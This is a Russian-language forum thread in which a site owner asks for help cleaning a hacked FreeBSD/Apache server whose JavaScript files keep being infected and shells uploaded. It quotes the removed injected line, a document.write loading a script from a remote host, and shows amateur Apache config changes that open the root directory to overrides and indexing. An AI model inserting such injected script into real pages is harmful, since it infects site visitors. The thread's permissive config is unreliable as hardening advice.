egorka-I

egorka-I
Рейтинг
111
Регистрация
27.10.2012

Вот данные, может этого хватит, если нет сообщите:

System 8.4-STABLE FreeBSD

Server API Apache 2.0 Handler

Apache Version Apache/2.2.25 (FreeBSD) PHP/5.3.11 with Suhosin-Patch DAV/2

панель управления ISPmanager

почтовый сервер sendmail думаю

Ранее как то с почтой были проблемы мне писали такое:

Был отключен squirrelmail и выставлены несоответствующие права к info@sait.ru

И не был запущен exim

TF-Studio:
Всё распаковывается чудесно.

Получилось! В официальном архиве 1 мБайт, там видимо для CSS что-то еще.

Может кто-то выложить архив айболита? С официального сайта при распаковке ошибку выдаёт и не все распаковывает.

С сайта скачал ai-bolit.zip при разархивировании выдаёт ошибку.

В результате папка: known_files, в ней 9 папок и никаких файлов php почему так?

Архиватор новый 7z932.msi

Код я вычистил:

<!-- js-tools -->

document.write('<script src="http://sait.ru/i/stat.php"></script>');

<!-- /js-tools -->

а что-то подозрительное другое не нашел...

Скачан весь хостинг на комп, как еще искать подозрительные файлы?

Спамить в .php - не знаю может быть...

Пароли от FTP сверхдлинные, пароль стоит главный в тотале, думаю здесь нет утечки.

У меня нет движка, самописные сайты. И я знаю какие именные файлы *.js у меня заражаются.

А еще, нашел в соседней теме и поставил права на папку 555.

У меня VDS-Отрыв. В каких папках-файлах лежат настройки сервера разобрался, например, знаю адреса файлов: php.ini, httpd.conf могу сам их отредактировать.

У меня другой вопрос будет.

1. Права изменил файла скрипта на 644.

2. Теперь хочу закрыть его, чтоб не был доступен, закинув в его папку .htaccess

<Files "slider-n.js">

Order Deny,Allow

Deny from all

</Files>

3. Чтоб сработал в этой папке .htaccess необходимо мне отредактировать файл httpd.conf

в нём сейчас так:

<Directory />

AllowOverride None

Order deny,allow

Deny from all

</Directory>

заменить на:

<Directory />

Options Indexes FollowSymLinks

AllowOverride All

Order deny,allow

Satisfy all

</Directory>

Тем самым закроется возможность внедрения в файл скрипта постороннего кода шела.

А теперь вопрос: правильна ли последовательность шагов и будет ли результат?

Поправьте если я неверно понимаю.

Тихо... кто-то скажет должен я платить хостеру за эту настройку апача?

Andreyka:
Закрыть дыры, через которые льют шеллы

Для этого и создал пост).

В соседней ветке написано: "3. все директории, в которые производится загрузка файлов или кэширование - делаем read-write и кладем в них волшебный .htaccess, который либо делает deny from all

либо запрещает вызов php"

Но у меня не срабатывает .htaccess поскольку нет доступа для настройки в апаче.

Права ли техподдержка, и что я сам смогу сделать еще?

Перенесите тему админы...

---------- Добавлено 12.04.2014 в 11:22 ----------

mff:
XSS уязвимость на одном из сайтов. Заливают шелку и получают доступ ко всем файлам ваших всех сайтов на этом акке.
Весь вредоносный код я удалил типа:

<!-- js-tools -->

document.write('<script src="http://sait.ru/i/stat.php"></script>');

<!-- /js-tools -->

как найти XSS уязвимость?

Всего: 116